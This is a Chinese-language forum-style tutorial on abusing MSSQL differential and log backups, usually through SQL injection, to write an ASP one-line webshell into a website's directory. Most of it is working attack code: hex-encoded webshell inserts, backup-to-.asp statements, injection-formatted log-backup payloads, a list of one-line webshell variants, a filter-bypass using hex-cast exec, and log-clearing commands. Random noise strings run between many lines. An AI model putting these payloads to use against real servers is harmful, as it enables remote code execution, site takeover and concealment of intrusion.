MSsql差异备份总结

admin

差异备份的流程大概这样：
# M3 R- b1 x; Z4 h1.完整备份一次(保存位置当然可以改)
6 o6 A" V7 F; _' Y: l6 u. Bbackup database 库名 to disk = 'c:\ddd.bak';--
' v% L/ I3 c4 G# \9 y  J
  p2 d* M( m$ R9 Q2 X2 r3 u. [2.创建表并插曲入数据
# K$ W: e: Q$ kcreate table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
7 S* @7 \+ j) x0 S% ^! j/ [! ?* g# @, s
3.进行差异备份
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

上面
1 y5 g. Y: u" m8 v8 K0x3C25657865637574652872657175657374282261222929253E
& V" y7 m1 o$ ?+ f! `: [就是一句话木马的内容：<%execute(request("a"))%>
7 d7 U  X8 q) c+ ^' |# {, |; p  q
2 h( {% z& ^4 S如下是网上常见的差异备份代码，思路一样！
, C1 r) p- N2 q% J2 g===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:
) [& C: @+ j' k. n" P% d
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表
/ `. I* h, U) G

% }: Y* K+ f( \: x' h8 n( cinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中
6 s0 t2 O$ ^( l5 q
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

& t) ]- c5 ?# c6 W" F2 J7 ldrop table [xiaolu]  -- 删除此表。

0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp

, c5 ?+ X* c5 O* w4 w& [+ E声明：方法不是我想的，我只是写工具，默认得到shell是
3 I8 o3 A5 j# m$ @<%execute(request("a"))%>
===============================================================
: p* _4 T9 R* l. v8 V
) n0 M( o1 z  L# V4 ?我发现上面代码，有时会无效，而直接用

backup database 库名 to disk = 'c:\ddd.bak'

create table [dbo].[dtest] ([cmd] [image]);

insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
0 v) g! B/ [& ]; }
却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
3 K' ^8 z* d, T3 }& U0 _
: K# w8 y4 m  m# l. U% N库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
8 }" G& v  @$ E# X$ C# z$ m4 P/ M
1 f& a$ P1 i- h/ n) g) E网上还有log增量备份的，我也把他记录一下
1 m/ J+ {- U. ?( n* f# X: r=====================================================
  f4 ?+ F- _; ?$ T8 \0 ^另一种log增量备份技术:
( L) B- N* ?. o( v5 E) ?3 E
, x# s8 I# G* `/ M; }  b';alter database null set RECOVERY FULL--

4 I8 }7 R6 N# H2 T0 X: E; `& T- [';create table cmd (a image)--
2 |3 `* N* j% F* X3 C8 D
';backup log null to disk = 'f:\cmd' with init--

';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
3 }8 J# j$ w* v; C9 n  ]. ~
';backup log null to disk = '备份路径'--

';drop table cmd--

7 t6 r' F+ l( J$ o8 o! g+ H( o8 t';alter database XXX set RECOVERY SIMPLE--
" i4 B! G! D% H7 i9 W
6 w- I. F6 A, i. xPS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的
2 F1 i6 W4 S5 M3 `
说到一句话马，还可以有这么几种写法：

4 A* ~/ F: j# w- V1 d6 ja)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
c)%><%execute request("a")%><%
/ m; C: U2 v/ x3 v, a" m: od)<script language=VBScript runat=server>execute request("a")</script>
1 H& t6 b. t% t  D. o4 \8 j( w+ Be)<%25Execute(request("a"))%25>
/ g/ M8 |/ S$ H3 Cf)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
h)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
6 g- u* j! ~0 m6 aI)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话

% R* q8 ]) @5 r=============================================

6 U+ J/ `1 x: a  ?: m! B8 M" Y3 ?当遇到差备过滤了/时用这个语句代替
/ M' F. e: l/ x* n' i
$ a; K0 `* @2 ?9 ~( h2 k! ^  \- _: Xdeclare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--

: ^7 ]& g. j- v) |9 Q把要执行的语句转16进制然后用exec执行

' F* |8 i. i. b7 S: Y9 @, o: {
% t8 L+ V. n$ o$ c. Z) {减少备份文件大小方法如下:

总的来说就是那么简单几句,下面以备份数据库model为例子
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
id=1;backup database model to disk='你的路径‘ with differential,format;--

* N0 c2 j9 H0 S# ~, M! f$ f

$ S/ K1 E0 U# q8 Y) d; _SQL语句清理日志
注：test为数据库名

$ d, [2 b6 C% q9 K7 |--清空日志
DUMP TRANSACTION test WITH NO_LOG
1 k. o# g4 _) D: Q4 v8 Z
--截断事务日志
BACKUP LOG test WITH NO_LOG

--收缩数据库
# a& `; r, k& J3 d4 f" S1 T* l6 w8 QDBCC SHRINKDATABASE(test)
- m; A$ I! `+ g! p1 Z
--收缩指定数据文件,1是文件号,可以通过这个语句查询到
) O* R! P: {2 H7 eSelect * from sysfiles DBCC SHRINKFILE(1)

--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'